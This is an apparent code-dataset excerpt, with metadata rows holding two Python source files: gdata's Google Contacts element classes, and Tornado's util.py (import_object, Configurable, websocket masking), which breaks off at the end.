repo_name
stringlengths 5
100
| path
stringlengths 4
299
| copies
stringclasses 990
values | size
stringlengths 4
7
| content
stringlengths 666
1.03M
| license
stringclasses 15
values | hash
int64 -9,223,351,895,964,839,000
9,223,297,778B
| line_mean
float64 3.17
100
| line_max
int64 7
1k
| alpha_frac
float64 0.25
0.98
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
kbdick/RecycleTracker | recyclecollector/scrap/gdata-2.0.18/src/gdata/contacts/__init__.py | 119 | 28208 | #!/usr/bin/env python
#
# Copyright 2009 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains extensions to ElementWrapper objects used with Google Contacts."""
__author__ = 'dbrattli (Dag Brattli)'
import atom
import gdata
## Constants from http://code.google.com/apis/gdata/elements.html ##
REL_HOME = 'http://schemas.google.com/g/2005#home'
REL_WORK = 'http://schemas.google.com/g/2005#work'
REL_OTHER = 'http://schemas.google.com/g/2005#other'
# AOL Instant Messenger protocol
IM_AIM = 'http://schemas.google.com/g/2005#AIM'
IM_MSN = 'http://schemas.google.com/g/2005#MSN' # MSN Messenger protocol
IM_YAHOO = 'http://schemas.google.com/g/2005#YAHOO' # Yahoo Messenger protocol
IM_SKYPE = 'http://schemas.google.com/g/2005#SKYPE' # Skype protocol
IM_QQ = 'http://schemas.google.com/g/2005#QQ' # QQ protocol
# Google Talk protocol
IM_GOOGLE_TALK = 'http://schemas.google.com/g/2005#GOOGLE_TALK'
IM_ICQ = 'http://schemas.google.com/g/2005#ICQ' # ICQ protocol
IM_JABBER = 'http://schemas.google.com/g/2005#JABBER' # Jabber protocol
IM_NETMEETING = 'http://schemas.google.com/g/2005#netmeeting' # NetMeeting
PHOTO_LINK_REL = 'http://schemas.google.com/contacts/2008/rel#photo'
PHOTO_EDIT_LINK_REL = 'http://schemas.google.com/contacts/2008/rel#edit-photo'
# Different phone types, for more info see:
# http://code.google.com/apis/gdata/docs/2.0/elements.html#gdPhoneNumber
PHONE_CAR = 'http://schemas.google.com/g/2005#car'
PHONE_FAX = 'http://schemas.google.com/g/2005#fax'
PHONE_GENERAL = 'http://schemas.google.com/g/2005#general'
PHONE_HOME = REL_HOME
PHONE_HOME_FAX = 'http://schemas.google.com/g/2005#home_fax'
PHONE_INTERNAL = 'http://schemas.google.com/g/2005#internal-extension'
PHONE_MOBILE = 'http://schemas.google.com/g/2005#mobile'
PHONE_OTHER = REL_OTHER
PHONE_PAGER = 'http://schemas.google.com/g/2005#pager'
PHONE_SATELLITE = 'http://schemas.google.com/g/2005#satellite'
PHONE_VOIP = 'http://schemas.google.com/g/2005#voip'
PHONE_WORK = REL_WORK
PHONE_WORK_FAX = 'http://schemas.google.com/g/2005#work_fax'
PHONE_WORK_MOBILE = 'http://schemas.google.com/g/2005#work_mobile'
PHONE_WORK_PAGER = 'http://schemas.google.com/g/2005#work_pager'
PHONE_MAIN = 'http://schemas.google.com/g/2005#main'
PHONE_ASSISTANT = 'http://schemas.google.com/g/2005#assistant'
PHONE_CALLBACK = 'http://schemas.google.com/g/2005#callback'
PHONE_COMPANY_MAIN = 'http://schemas.google.com/g/2005#company_main'
PHONE_ISDN = 'http://schemas.google.com/g/2005#isdn'
PHONE_OTHER_FAX = 'http://schemas.google.com/g/2005#other_fax'
PHONE_RADIO = 'http://schemas.google.com/g/2005#radio'
PHONE_TELEX = 'http://schemas.google.com/g/2005#telex'
PHONE_TTY_TDD = 'http://schemas.google.com/g/2005#tty_tdd'
EXTERNAL_ID_ORGANIZATION = 'organization'
RELATION_MANAGER = 'manager'
CONTACTS_NAMESPACE = 'http://schemas.google.com/contact/2008'
class GDataBase(atom.AtomBase):
"""The Google Contacts intermediate class from atom.AtomBase."""
_namespace = gdata.GDATA_NAMESPACE
_children = atom.AtomBase._children.copy()
_attributes = atom.AtomBase._attributes.copy()
def __init__(self, text=None,
extension_elements=None, extension_attributes=None):
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
class ContactsBase(GDataBase):
"""The Google Contacts intermediate class for Contacts namespace."""
_namespace = CONTACTS_NAMESPACE
class OrgName(GDataBase):
"""The Google Contacts OrgName element."""
_tag = 'orgName'
class OrgTitle(GDataBase):
"""The Google Contacts OrgTitle element."""
_tag = 'orgTitle'
class OrgDepartment(GDataBase):
"""The Google Contacts OrgDepartment element."""
_tag = 'orgDepartment'
class OrgJobDescription(GDataBase):
"""The Google Contacts OrgJobDescription element."""
_tag = 'orgJobDescription'
class Where(GDataBase):
"""The Google Contacts Where element."""
_tag = 'where'
_children = GDataBase._children.copy()
_attributes = GDataBase._attributes.copy()
_attributes['rel'] = 'rel'
_attributes['label'] = 'label'
_attributes['valueString'] = 'value_string'
def __init__(self, value_string=None, rel=None, label=None,
text=None, extension_elements=None, extension_attributes=None):
GDataBase.__init__(self, text=text, extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.rel = rel
self.label = label
self.value_string = value_string
class When(GDataBase):
"""The Google Contacts When element."""
_tag = 'when'
_children = GDataBase._children.copy()
_attributes = GDataBase._attributes.copy()
_attributes['startTime'] = 'start_time'
_attributes['endTime'] = 'end_time'
_attributes['label'] = 'label'
def __init__(self, start_time=None, end_time=None, label=None,
text=None, extension_elements=None, extension_attributes=None):
GDataBase.__init__(self, text=text, extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.start_time = start_time
self.end_time = end_time
self.label = label
class Organization(GDataBase):
"""The Google Contacts Organization element."""
_tag = 'organization'
_children = GDataBase._children.copy()
_attributes = GDataBase._attributes.copy()
_attributes['label'] = 'label'
_attributes['rel'] = 'rel'
_attributes['primary'] = 'primary'
_children['{%s}orgName' % GDataBase._namespace] = (
'org_name', OrgName)
_children['{%s}orgTitle' % GDataBase._namespace] = (
'org_title', OrgTitle)
_children['{%s}orgDepartment' % GDataBase._namespace] = (
'org_department', OrgDepartment)
_children['{%s}orgJobDescription' % GDataBase._namespace] = (
'org_job_description', OrgJobDescription)
#_children['{%s}where' % GDataBase._namespace] = ('where', Where)
def __init__(self, label=None, rel=None, primary='false', org_name=None,
org_title=None, org_department=None, org_job_description=None,
where=None, text=None,
extension_elements=None, extension_attributes=None):
GDataBase.__init__(self, text=text, extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.label = label
self.rel = rel or REL_OTHER
self.primary = primary
self.org_name = org_name
self.org_title = org_title
self.org_department = org_department
self.org_job_description = org_job_description
self.where = where
class PostalAddress(GDataBase):
"""The Google Contacts PostalAddress element."""
_tag = 'postalAddress'
_children = GDataBase._children.copy()
_attributes = GDataBase._attributes.copy()
_attributes['rel'] = 'rel'
_attributes['primary'] = 'primary'
def __init__(self, primary=None, rel=None, text=None,
extension_elements=None, extension_attributes=None):
GDataBase.__init__(self, text=text, extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.rel = rel or REL_OTHER
self.primary = primary
class FormattedAddress(GDataBase):
"""The Google Contacts FormattedAddress element."""
_tag = 'formattedAddress'
class StructuredPostalAddress(GDataBase):
"""The Google Contacts StructuredPostalAddress element."""
_tag = 'structuredPostalAddress'
_children = GDataBase._children.copy()
_attributes = GDataBase._attributes.copy()
_attributes['rel'] = 'rel'
_attributes['primary'] = 'primary'
_children['{%s}formattedAddress' % GDataBase._namespace] = (
'formatted_address', FormattedAddress)
def __init__(self, rel=None, primary=None,
formatted_address=None, text=None,
extension_elements=None, extension_attributes=None):
GDataBase.__init__(self, text=text, extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.rel = rel or REL_OTHER
self.primary = primary
self.formatted_address = formatted_address
class IM(GDataBase):
"""The Google Contacts IM element."""
_tag = 'im'
_children = GDataBase._children.copy()
_attributes = GDataBase._attributes.copy()
_attributes['address'] = 'address'
_attributes['primary'] = 'primary'
_attributes['protocol'] = 'protocol'
_attributes['label'] = 'label'
_attributes['rel'] = 'rel'
def __init__(self, primary='false', rel=None, address=None, protocol=None,
label=None, text=None,
extension_elements=None, extension_attributes=None):
GDataBase.__init__(self, text=text, extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.protocol = protocol
self.address = address
self.primary = primary
self.rel = rel or REL_OTHER
self.label = label
class Email(GDataBase):
"""The Google Contacts Email element."""
_tag = 'email'
_children = GDataBase._children.copy()
_attributes = GDataBase._attributes.copy()
_attributes['address'] = 'address'
_attributes['primary'] = 'primary'
_attributes['rel'] = 'rel'
_attributes['label'] = 'label'
def __init__(self, label=None, rel=None, address=None, primary='false',
text=None, extension_elements=None, extension_attributes=None):
GDataBase.__init__(self, text=text, extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.label = label
self.rel = rel or REL_OTHER
self.address = address
self.primary = primary
class PhoneNumber(GDataBase):
"""The Google Contacts PhoneNumber element."""
_tag = 'phoneNumber'
_children = GDataBase._children.copy()
_attributes = GDataBase._attributes.copy()
_attributes['label'] = 'label'
_attributes['rel'] = 'rel'
_attributes['uri'] = 'uri'
_attributes['primary'] = 'primary'
def __init__(self, label=None, rel=None, uri=None, primary='false',
text=None, extension_elements=None, extension_attributes=None):
GDataBase.__init__(self, text=text, extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.label = label
self.rel = rel or REL_OTHER
self.uri = uri
self.primary = primary
class Nickname(ContactsBase):
"""The Google Contacts Nickname element."""
_tag = 'nickname'
class Occupation(ContactsBase):
"""The Google Contacts Occupation element."""
_tag = 'occupation'
class Gender(ContactsBase):
"""The Google Contacts Gender element."""
_tag = 'gender'
_children = ContactsBase._children.copy()
_attributes = ContactsBase._attributes.copy()
_attributes['value'] = 'value'
def __init__(self, value=None,
text=None, extension_elements=None, extension_attributes=None):
ContactsBase.__init__(self, text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.value = value
class Birthday(ContactsBase):
"""The Google Contacts Birthday element."""
_tag = 'birthday'
_children = ContactsBase._children.copy()
_attributes = ContactsBase._attributes.copy()
_attributes['when'] = 'when'
def __init__(self, when=None,
text=None, extension_elements=None, extension_attributes=None):
ContactsBase.__init__(self, text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.when = when
class Relation(ContactsBase):
"""The Google Contacts Relation element."""
_tag = 'relation'
_children = ContactsBase._children.copy()
_attributes = ContactsBase._attributes.copy()
_attributes['label'] = 'label'
_attributes['rel'] = 'rel'
def __init__(self, label=None, rel=None,
text=None, extension_elements=None, extension_attributes=None):
ContactsBase.__init__(self, text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.label = label
self.rel = rel
def RelationFromString(xml_string):
return atom.CreateClassFromXMLString(Relation, xml_string)
class UserDefinedField(ContactsBase):
"""The Google Contacts UserDefinedField element."""
_tag = 'userDefinedField'
_children = ContactsBase._children.copy()
_attributes = ContactsBase._attributes.copy()
_attributes['key'] = 'key'
_attributes['value'] = 'value'
def __init__(self, key=None, value=None,
text=None, extension_elements=None, extension_attributes=None):
ContactsBase.__init__(self, text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.key = key
self.value = value
def UserDefinedFieldFromString(xml_string):
return atom.CreateClassFromXMLString(UserDefinedField, xml_string)
class Website(ContactsBase):
"""The Google Contacts Website element."""
_tag = 'website'
_children = ContactsBase._children.copy()
_attributes = ContactsBase._attributes.copy()
_attributes['href'] = 'href'
_attributes['label'] = 'label'
_attributes['primary'] = 'primary'
_attributes['rel'] = 'rel'
def __init__(self, href=None, label=None, primary='false', rel=None,
text=None, extension_elements=None, extension_attributes=None):
ContactsBase.__init__(self, text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.href = href
self.label = label
self.primary = primary
self.rel = rel
def WebsiteFromString(xml_string):
return atom.CreateClassFromXMLString(Website, xml_string)
class ExternalId(ContactsBase):
"""The Google Contacts ExternalId element."""
_tag = 'externalId'
_children = ContactsBase._children.copy()
_attributes = ContactsBase._attributes.copy()
_attributes['label'] = 'label'
_attributes['rel'] = 'rel'
_attributes['value'] = 'value'
def __init__(self, label=None, rel=None, value=None,
text=None, extension_elements=None, extension_attributes=None):
ContactsBase.__init__(self, text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.label = label
self.rel = rel
self.value = value
def ExternalIdFromString(xml_string):
return atom.CreateClassFromXMLString(ExternalId, xml_string)
class Event(ContactsBase):
"""The Google Contacts Event element."""
_tag = 'event'
_children = ContactsBase._children.copy()
_attributes = ContactsBase._attributes.copy()
_attributes['label'] = 'label'
_attributes['rel'] = 'rel'
_children['{%s}when' % ContactsBase._namespace] = ('when', When)
def __init__(self, label=None, rel=None, when=None,
text=None, extension_elements=None, extension_attributes=None):
ContactsBase.__init__(self, text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.label = label
self.rel = rel
self.when = when
def EventFromString(xml_string):
return atom.CreateClassFromXMLString(Event, xml_string)
class Deleted(GDataBase):
"""The Google Contacts Deleted element."""
_tag = 'deleted'
class GroupMembershipInfo(ContactsBase):
"""The Google Contacts GroupMembershipInfo element."""
_tag = 'groupMembershipInfo'
_children = ContactsBase._children.copy()
_attributes = ContactsBase._attributes.copy()
_attributes['deleted'] = 'deleted'
_attributes['href'] = 'href'
def __init__(self, deleted=None, href=None, text=None,
extension_elements=None, extension_attributes=None):
ContactsBase.__init__(self, text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.deleted = deleted
self.href = href
class PersonEntry(gdata.BatchEntry):
"""Base class for ContactEntry and ProfileEntry."""
_children = gdata.BatchEntry._children.copy()
_children['{%s}organization' % gdata.GDATA_NAMESPACE] = (
'organization', [Organization])
_children['{%s}phoneNumber' % gdata.GDATA_NAMESPACE] = (
'phone_number', [PhoneNumber])
_children['{%s}nickname' % CONTACTS_NAMESPACE] = ('nickname', Nickname)
_children['{%s}occupation' % CONTACTS_NAMESPACE] = ('occupation', Occupation)
_children['{%s}gender' % CONTACTS_NAMESPACE] = ('gender', Gender)
_children['{%s}birthday' % CONTACTS_NAMESPACE] = ('birthday', Birthday)
_children['{%s}postalAddress' % gdata.GDATA_NAMESPACE] = ('postal_address',
[PostalAddress])
_children['{%s}structuredPostalAddress' % gdata.GDATA_NAMESPACE] = (
'structured_postal_address', [StructuredPostalAddress])
_children['{%s}email' % gdata.GDATA_NAMESPACE] = ('email', [Email])
_children['{%s}im' % gdata.GDATA_NAMESPACE] = ('im', [IM])
_children['{%s}relation' % CONTACTS_NAMESPACE] = ('relation', [Relation])
_children['{%s}userDefinedField' % CONTACTS_NAMESPACE] = (
'user_defined_field', [UserDefinedField])
_children['{%s}website' % CONTACTS_NAMESPACE] = ('website', [Website])
_children['{%s}externalId' % CONTACTS_NAMESPACE] = (
'external_id', [ExternalId])
_children['{%s}event' % CONTACTS_NAMESPACE] = ('event', [Event])
# The following line should be removed once the Python support
# for GData 2.0 is mature.
_attributes = gdata.BatchEntry._attributes.copy()
_attributes['{%s}etag' % gdata.GDATA_NAMESPACE] = 'etag'
def __init__(self, author=None, category=None, content=None,
atom_id=None, link=None, published=None,
title=None, updated=None, organization=None, phone_number=None,
nickname=None, occupation=None, gender=None, birthday=None,
postal_address=None, structured_postal_address=None, email=None,
im=None, relation=None, user_defined_field=None, website=None,
external_id=None, event=None, batch_operation=None,
batch_id=None, batch_status=None, text=None,
extension_elements=None, extension_attributes=None, etag=None):
gdata.BatchEntry.__init__(self, author=author, category=category,
content=content, atom_id=atom_id, link=link,
published=published,
batch_operation=batch_operation,
batch_id=batch_id, batch_status=batch_status,
title=title, updated=updated)
self.organization = organization or []
self.phone_number = phone_number or []
self.nickname = nickname
self.occupation = occupation
self.gender = gender
self.birthday = birthday
self.postal_address = postal_address or []
self.structured_postal_address = structured_postal_address or []
self.email = email or []
self.im = im or []
self.relation = relation or []
self.user_defined_field = user_defined_field or []
self.website = website or []
self.external_id = external_id or []
self.event = event or []
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
# The following line should be removed once the Python support
# for GData 2.0 is mature.
self.etag = etag
class ContactEntry(PersonEntry):
"""A Google Contact flavor of an Atom Entry."""
_children = PersonEntry._children.copy()
_children['{%s}deleted' % gdata.GDATA_NAMESPACE] = ('deleted', Deleted)
_children['{%s}groupMembershipInfo' % CONTACTS_NAMESPACE] = (
'group_membership_info', [GroupMembershipInfo])
_children['{%s}extendedProperty' % gdata.GDATA_NAMESPACE] = (
'extended_property', [gdata.ExtendedProperty])
# Overwrite the organization rule in PersonEntry so that a ContactEntry
# may only contain one <gd:organization> element.
_children['{%s}organization' % gdata.GDATA_NAMESPACE] = (
'organization', Organization)
def __init__(self, author=None, category=None, content=None,
atom_id=None, link=None, published=None,
title=None, updated=None, organization=None, phone_number=None,
nickname=None, occupation=None, gender=None, birthday=None,
postal_address=None, structured_postal_address=None, email=None,
im=None, relation=None, user_defined_field=None, website=None,
external_id=None, event=None, batch_operation=None,
batch_id=None, batch_status=None, text=None,
extension_elements=None, extension_attributes=None, etag=None,
deleted=None, extended_property=None,
group_membership_info=None):
PersonEntry.__init__(self, author=author, category=category,
content=content, atom_id=atom_id, link=link,
published=published, title=title, updated=updated,
organization=organization, phone_number=phone_number,
nickname=nickname, occupation=occupation,
gender=gender, birthday=birthday,
postal_address=postal_address,
structured_postal_address=structured_postal_address,
email=email, im=im, relation=relation,
user_defined_field=user_defined_field,
website=website, external_id=external_id, event=event,
batch_operation=batch_operation, batch_id=batch_id,
batch_status=batch_status, text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes, etag=etag)
self.deleted = deleted
self.extended_property = extended_property or []
self.group_membership_info = group_membership_info or []
def GetPhotoLink(self):
for a_link in self.link:
if a_link.rel == PHOTO_LINK_REL:
return a_link
return None
def GetPhotoEditLink(self):
for a_link in self.link:
if a_link.rel == PHOTO_EDIT_LINK_REL:
return a_link
return None
def ContactEntryFromString(xml_string):
return atom.CreateClassFromXMLString(ContactEntry, xml_string)
class ContactsFeed(gdata.BatchFeed, gdata.LinkFinder):
"""A Google Contacts feed flavor of an Atom Feed."""
_children = gdata.BatchFeed._children.copy()
_children['{%s}entry' % atom.ATOM_NAMESPACE] = ('entry', [ContactEntry])
def __init__(self, author=None, category=None, contributor=None,
generator=None, icon=None, atom_id=None, link=None, logo=None,
rights=None, subtitle=None, title=None, updated=None,
entry=None, total_results=None, start_index=None,
items_per_page=None, extension_elements=None,
extension_attributes=None, text=None):
gdata.BatchFeed.__init__(self, author=author, category=category,
contributor=contributor, generator=generator,
icon=icon, atom_id=atom_id, link=link,
logo=logo, rights=rights, subtitle=subtitle,
title=title, updated=updated, entry=entry,
total_results=total_results,
start_index=start_index,
items_per_page=items_per_page,
extension_elements=extension_elements,
extension_attributes=extension_attributes,
text=text)
def ContactsFeedFromString(xml_string):
return atom.CreateClassFromXMLString(ContactsFeed, xml_string)
class GroupEntry(gdata.BatchEntry):
"""Represents a contact group."""
_children = gdata.BatchEntry._children.copy()
_children['{%s}extendedProperty' % gdata.GDATA_NAMESPACE] = (
'extended_property', [gdata.ExtendedProperty])
def __init__(self, author=None, category=None, content=None,
contributor=None, atom_id=None, link=None, published=None,
rights=None, source=None, summary=None, control=None,
title=None, updated=None,
extended_property=None, batch_operation=None, batch_id=None,
batch_status=None,
extension_elements=None, extension_attributes=None, text=None):
gdata.BatchEntry.__init__(self, author=author, category=category,
content=content,
atom_id=atom_id, link=link, published=published,
batch_operation=batch_operation,
batch_id=batch_id, batch_status=batch_status,
title=title, updated=updated)
self.extended_property = extended_property or []
def GroupEntryFromString(xml_string):
return atom.CreateClassFromXMLString(GroupEntry, xml_string)
class GroupsFeed(gdata.BatchFeed):
"""A Google contact groups feed flavor of an Atom Feed."""
_children = gdata.BatchFeed._children.copy()
_children['{%s}entry' % atom.ATOM_NAMESPACE] = ('entry', [GroupEntry])
def GroupsFeedFromString(xml_string):
return atom.CreateClassFromXMLString(GroupsFeed, xml_string)
class ProfileEntry(PersonEntry):
"""A Google Profiles flavor of an Atom Entry."""
def ProfileEntryFromString(xml_string):
"""Converts an XML string into a ProfileEntry object.
Args:
xml_string: string The XML describing a Profile entry.
Returns:
A ProfileEntry object corresponding to the given XML.
"""
return atom.CreateClassFromXMLString(ProfileEntry, xml_string)
class ProfilesFeed(gdata.BatchFeed, gdata.LinkFinder):
"""A Google Profiles feed flavor of an Atom Feed."""
_children = gdata.BatchFeed._children.copy()
_children['{%s}entry' % atom.ATOM_NAMESPACE] = ('entry', [ProfileEntry])
def __init__(self, author=None, category=None, contributor=None,
generator=None, icon=None, atom_id=None, link=None, logo=None,
rights=None, subtitle=None, title=None, updated=None,
entry=None, total_results=None, start_index=None,
items_per_page=None, extension_elements=None,
extension_attributes=None, text=None):
gdata.BatchFeed.__init__(self, author=author, category=category,
contributor=contributor, generator=generator,
icon=icon, atom_id=atom_id, link=link,
logo=logo, rights=rights, subtitle=subtitle,
title=title, updated=updated, entry=entry,
total_results=total_results,
start_index=start_index,
items_per_page=items_per_page,
extension_elements=extension_elements,
extension_attributes=extension_attributes,
text=text)
def ProfilesFeedFromString(xml_string):
"""Converts an XML string into a ProfilesFeed object.
Args:
xml_string: string The XML describing a Profiles feed.
Returns:
A ProfilesFeed object corresponding to the given XML.
"""
return atom.CreateClassFromXMLString(ProfilesFeed, xml_string)
| gpl-3.0 | 4,873,943,453,772,972,000 | 37.118919 | 79 | 0.654991 | false |
doot/CouchPotatoServer | libs/tornado/util.py | 102 | 12256 | """Miscellaneous utility functions and classes.
This module is used internally by Tornado. It is not necessarily expected
that the functions and classes defined here will be useful to other
applications, but they are documented here in case they are.
The one public-facing part of this module is the `Configurable` class
and its `~Configurable.configure` method, which becomes a part of the
interface of its subclasses, including `.AsyncHTTPClient`, `.IOLoop`,
and `.Resolver`.
"""
from __future__ import absolute_import, division, print_function, with_statement
import array
import inspect
import os
import sys
import zlib
try:
xrange # py2
except NameError:
xrange = range # py3
class ObjectDict(dict):
"""Makes a dictionary behave like an object, with attribute-style access.
"""
def __getattr__(self, name):
try:
return self[name]
except KeyError:
raise AttributeError(name)
def __setattr__(self, name, value):
self[name] = value
class GzipDecompressor(object):
"""Streaming gzip decompressor.
The interface is like that of `zlib.decompressobj` (without some of the
optional arguments, but it understands gzip headers and checksums.
"""
def __init__(self):
# Magic parameter makes zlib module understand gzip header
# http://stackoverflow.com/questions/1838699/how-can-i-decompress-a-gzip-stream-with-zlib
# This works on cpython and pypy, but not jython.
self.decompressobj = zlib.decompressobj(16 + zlib.MAX_WBITS)
def decompress(self, value, max_length=None):
"""Decompress a chunk, returning newly-available data.
Some data may be buffered for later processing; `flush` must
be called when there is no more input data to ensure that
all data was processed.
If ``max_length`` is given, some input data may be left over
in ``unconsumed_tail``; you must retrieve this value and pass
it back to a future call to `decompress` if it is not empty.
"""
return self.decompressobj.decompress(value, max_length)
@property
def unconsumed_tail(self):
"""Returns the unconsumed portion left over
"""
return self.decompressobj.unconsumed_tail
def flush(self):
"""Return any remaining buffered data not yet returned by decompress.
Also checks for errors such as truncated input.
No other methods may be called on this object after `flush`.
"""
return self.decompressobj.flush()
def import_object(name):
"""Imports an object by name.
import_object('x') is equivalent to 'import x'.
import_object('x.y.z') is equivalent to 'from x.y import z'.
>>> import tornado.escape
>>> import_object('tornado.escape') is tornado.escape
True
>>> import_object('tornado.escape.utf8') is tornado.escape.utf8
True
>>> import_object('tornado') is tornado
True
>>> import_object('tornado.missing_module')
Traceback (most recent call last):
...
ImportError: No module named missing_module
"""
if name.count('.') == 0:
return __import__(name, None, None)
parts = name.split('.')
obj = __import__('.'.join(parts[:-1]), None, None, [parts[-1]], 0)
try:
return getattr(obj, parts[-1])
except AttributeError:
raise ImportError("No module named %s" % parts[-1])
# Fake unicode literal support: Python 3.2 doesn't have the u'' marker for
# literal strings, and alternative solutions like "from __future__ import
# unicode_literals" have other problems (see PEP 414). u() can be applied
# to ascii strings that include \u escapes (but they must not contain
# literal non-ascii characters).
if type('') is not type(b''):
def u(s):
return s
unicode_type = str
basestring_type = str
else:
def u(s):
return s.decode('unicode_escape')
unicode_type = unicode
basestring_type = basestring
# Deprecated alias that was used before we dropped py25 support.
# Left here in case anyone outside Tornado is using it.
bytes_type = bytes
if sys.version_info > (3,):
exec("""
def raise_exc_info(exc_info):
raise exc_info[1].with_traceback(exc_info[2])
def exec_in(code, glob, loc=None):
if isinstance(code, str):
code = compile(code, '<string>', 'exec', dont_inherit=True)
exec(code, glob, loc)
""")
else:
exec("""
def raise_exc_info(exc_info):
raise exc_info[0], exc_info[1], exc_info[2]
def exec_in(code, glob, loc=None):
if isinstance(code, basestring):
# exec(string) inherits the caller's future imports; compile
# the string first to prevent that.
code = compile(code, '<string>', 'exec', dont_inherit=True)
exec code in glob, loc
""")
def errno_from_exception(e):
"""Provides the errno from an Exception object.
There are cases that the errno attribute was not set so we pull
the errno out of the args but if someone instantiates an Exception
without any args you will get a tuple error. So this function
abstracts all that behavior to give you a safe way to get the
errno.
"""
if hasattr(e, 'errno'):
return e.errno
elif e.args:
return e.args[0]
else:
return None
class Configurable(object):
"""Base class for configurable interfaces.
A configurable interface is an (abstract) class whose constructor
acts as a factory function for one of its implementation subclasses.
The implementation subclass as well as optional keyword arguments to
its initializer can be set globally at runtime with `configure`.
By using the constructor as the factory method, the interface
looks like a normal class, `isinstance` works as usual, etc. This
pattern is most useful when the choice of implementation is likely
to be a global decision (e.g. when `~select.epoll` is available,
always use it instead of `~select.select`), or when a
previously-monolithic class has been split into specialized
subclasses.
Configurable subclasses must define the class methods
`configurable_base` and `configurable_default`, and use the instance
method `initialize` instead of ``__init__``.
"""
__impl_class = None
__impl_kwargs = None
def __new__(cls, **kwargs):
base = cls.configurable_base()
args = {}
if cls is base:
impl = cls.configured_class()
if base.__impl_kwargs:
args.update(base.__impl_kwargs)
else:
impl = cls
args.update(kwargs)
instance = super(Configurable, cls).__new__(impl)
# initialize vs __init__ chosen for compatibility with AsyncHTTPClient
# singleton magic. If we get rid of that we can switch to __init__
# here too.
instance.initialize(**args)
return instance
@classmethod
def configurable_base(cls):
"""Returns the base class of a configurable hierarchy.
This will normally return the class in which it is defined.
(which is *not* necessarily the same as the cls classmethod parameter).
"""
raise NotImplementedError()
@classmethod
def configurable_default(cls):
"""Returns the implementation class to be used if none is configured."""
raise NotImplementedError()
def initialize(self):
"""Initialize a `Configurable` subclass instance.
Configurable classes should use `initialize` instead of ``__init__``.
"""
@classmethod
def configure(cls, impl, **kwargs):
"""Sets the class to use when the base class is instantiated.
Keyword arguments will be saved and added to the arguments passed
to the constructor. This can be used to set global defaults for
some parameters.
"""
base = cls.configurable_base()
if isinstance(impl, (unicode_type, bytes)):
impl = import_object(impl)
if impl is not None and not issubclass(impl, cls):
raise ValueError("Invalid subclass of %s" % cls)
base.__impl_class = impl
base.__impl_kwargs = kwargs
@classmethod
def configured_class(cls):
"""Returns the currently configured class."""
base = cls.configurable_base()
if cls.__impl_class is None:
base.__impl_class = cls.configurable_default()
return base.__impl_class
@classmethod
def _save_configuration(cls):
base = cls.configurable_base()
return (base.__impl_class, base.__impl_kwargs)
@classmethod
def _restore_configuration(cls, saved):
base = cls.configurable_base()
base.__impl_class = saved[0]
base.__impl_kwargs = saved[1]
class ArgReplacer(object):
"""Replaces one value in an ``args, kwargs`` pair.
Inspects the function signature to find an argument by name
whether it is passed by position or keyword. For use in decorators
and similar wrappers.
"""
def __init__(self, func, name):
self.name = name
try:
self.arg_pos = inspect.getargspec(func).args.index(self.name)
except ValueError:
# Not a positional parameter
self.arg_pos = None
def get_old_value(self, args, kwargs, default=None):
"""Returns the old value of the named argument without replacing it.
Returns ``default`` if the argument is not present.
"""
if self.arg_pos is not None and len(args) > self.arg_pos:
return args[self.arg_pos]
else:
return kwargs.get(self.name, default)
def replace(self, new_value, args, kwargs):
"""Replace the named argument in ``args, kwargs`` with ``new_value``.
Returns ``(old_value, args, kwargs)``. The returned ``args`` and
``kwargs`` objects may not be the same as the input objects, or
the input objects may be mutated.
If the named argument was not found, ``new_value`` will be added
to ``kwargs`` and None will be returned as ``old_value``.
"""
if self.arg_pos is not None and len(args) > self.arg_pos:
# The arg to replace is passed positionally
old_value = args[self.arg_pos]
args = list(args) # *args is normally a tuple
args[self.arg_pos] = new_value
else:
# The arg to replace is either omitted or passed by keyword.
old_value = kwargs.get(self.name)
kwargs[self.name] = new_value
return old_value, args, kwargs
def timedelta_to_seconds(td):
"""Equivalent to td.total_seconds() (introduced in python 2.7)."""
return (td.microseconds + (td.seconds + td.days * 24 * 3600) * 10 ** 6) / float(10 ** 6)
def _websocket_mask_python(mask, data):
"""Websocket masking function.
`mask` is a `bytes` object of length 4; `data` is a `bytes` object of any length.
Returns a `bytes` object of the same length as `data` with the mask applied
as specified in section 5.3 of RFC 6455.
This pure-python implementation may be replaced by an optimized version when available.
"""
mask = array.array("B", mask)
unmasked = array.array("B", data)
for i in xrange(len(data)):
unmasked[i] = unmasked[i] ^ mask[i % 4]
if hasattr(unmasked, 'tobytes'):
# tostring was deprecated in py32. It hasn't been removed,
# but since we turn on deprecation warnings in our tests
# we need to use the right one.
return unmasked.tobytes()
else:
return unmasked.tostring()
if (os.environ.get('TORNADO_NO_EXTENSION') or
os.environ.get('TORNADO_EXTENSION') == '0'):
# These environment variables exist to make it easier to do performance
# comparisons; they are not guaranteed to remain supported in the future.
_websocket_mask = _websocket_mask_python
else:
try:
from tornado.speedups import websocket_mask as _websocket_mask
except ImportError:
if os.environ.get('TORNADO_EXTENSION') == '1':
raise
_websocket_mask = _websocket_mask_python
def doctests():
